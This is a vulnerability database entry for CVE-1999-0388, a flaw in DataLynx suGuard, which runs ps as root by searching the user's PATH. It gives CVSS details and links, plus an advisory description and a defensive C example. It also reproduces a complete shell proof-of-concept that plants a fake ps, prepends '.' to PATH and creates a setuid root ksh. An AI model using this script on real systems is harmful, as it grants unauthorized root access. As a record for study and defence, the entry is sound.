CVE-1999-0388
CVSS 4.6
Published: 1999-01-01 00:00:00
Revised: 2008-09-09 08:34:26

[Original] DataLynx suGuard trusts the PATH environment variable to execute the ps command, allowing local users to execute commands as root.


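[CNNVD] DataLynx suGuard command execution as root vulnerability (CNNVD-199901-006)

        DataLynx suGuard trusts the PATH environment variable when executing the ps command; local users can exploit this vulnerability to execute commands as root.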

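- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interruption of resource access]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]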

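- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0388
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0388
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199901-006
(Official data source) CNNVD

- Other links and resources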

http://www.osvdb.org/3186
(UNKNOWN)  OSVDB  3186

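- Vulnerability information

DataLynx suGuard command execution as root vulnerability
Medium risk   Unknown
1999-01-01 00:00:00 2005-05-02 00:00:00
Local
        DataLynx suGuard trusts the PATH environment variable when executing the ps command; local users can exploit this vulnerability to execute commands as root.

- Advisories and patches


- Vulnerability information (19146)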

DataLynx suGuard 1.0 Vulnerability (EDBID:19146)
linux local
1999-01-03 Verified
0 Dr. Mudge
source: http://www.securityfocus.com/bid/186/info

A vulnerability exists within DataLynx's suGuard program which allows a local attacker to gain administrative privilege by exploiting poor use of the /tmp directory and poor programming.

#!/bin/sh
# sgrun exploit - the types of vulnerabilities that this exploit exercises
#  have no right being introduced to code in this day and age. Much less
#  code which presents itself under the pretenses of securing your system.
#   .mudge 01.02.99
#
SUSHI=./sushi

if [ $# -ne 2 ] ; then
  echo Must specify path to sgrun [/bin/datalynx/sgrun] and sgrun argument
  echo  mudge@l0pht.com [01.02.99]
  exit 1
fi
  
SGRUN=$1
ARG=$2

if [ -f ${SUSHI} ] ; then
  echo root shell already created?
  exit
fi

echo datalynx sgrun proof of concept exploit from L0pht [mudge@l0pht.com]
echo

cat > ./ps << FOEFOE
#!/bin/sh
cp /bin/ksh ${SUSHI}
chown root ${SUSHI}
chmod 4555 ${SUSHI}
FOEFOE

chmod 755 ./ps

PATH=.:${PATH}
export PATH

#/bin/datalynx/sgrun Identify 
${SGRUN} ${ARG}
if [ -f ${SUSHI} ] ; then
  echo root shell created as ${SUSHI}
  ls -l ${SUSHI}
  echo
fi  		

- Vulnerability information

3186
suGuard sgrun Execute Arbitrary Local Commands

- Vulnerability description

suGuard contains a flaw that allows any local user to gain root privileges. The flaw is due to suGuard's main application running the 'ps' program based on the user's PATH environment. When it calls the program it does so with root privileges, but does not verify the program it is running. A malicious local attacker can put a specially crafted 'ps' command in their path and have suGuard run it instead.
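
A defensive illustration of the flaw described above, added here and not taken from suGuard or from the original advisory: a C check that flags a PATH a privileged program must not search, and a wrapper that runs a helper only by absolute path with a fixed environment. The function names and the fixed PATH value are assumptions made for this example.

```c
/* Added example, not suGuard code: PATH audit plus a PATH-free exec wrapper. */
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns 1 if a privileged program must not search this PATH: it is unset
 * (fallback search is implementation-defined), or has an empty entry (which
 * means the current directory), "." or any other relative directory. */
int path_has_untrusted_entry(const char *path)
{
    if (path == NULL)
        return 1;
    for (const char *p = path;;) {
        const char *end = strchr(p, ':');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        if (len == 0 || p[0] != '/')
            return 1;
        if (end == NULL)
            return 0;
        p = end + 1;
    }
}

/* Runs a helper by absolute path with a fixed environment, so the caller's
 * PATH is never consulted. Returns the exit status, or -1 on refusal/error. */
int run_absolute(const char *abs_path, char *const argv[])
{
    static char *const fixed_env[] = { "PATH=/bin:/usr/bin", NULL };
    int status;
    pid_t pid;

    if (abs_path == NULL || abs_path[0] != '/')
        return -1;                      /* a bare name like "ps" is refused */
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, fixed_env);
        _exit(127);                     /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

A privileged program that needs process listings would call `run_absolute` with the absolute location of `ps` on its platform, which the page does not state.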

- Timeline

1999-01-03 Unknown
1999-01-03 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
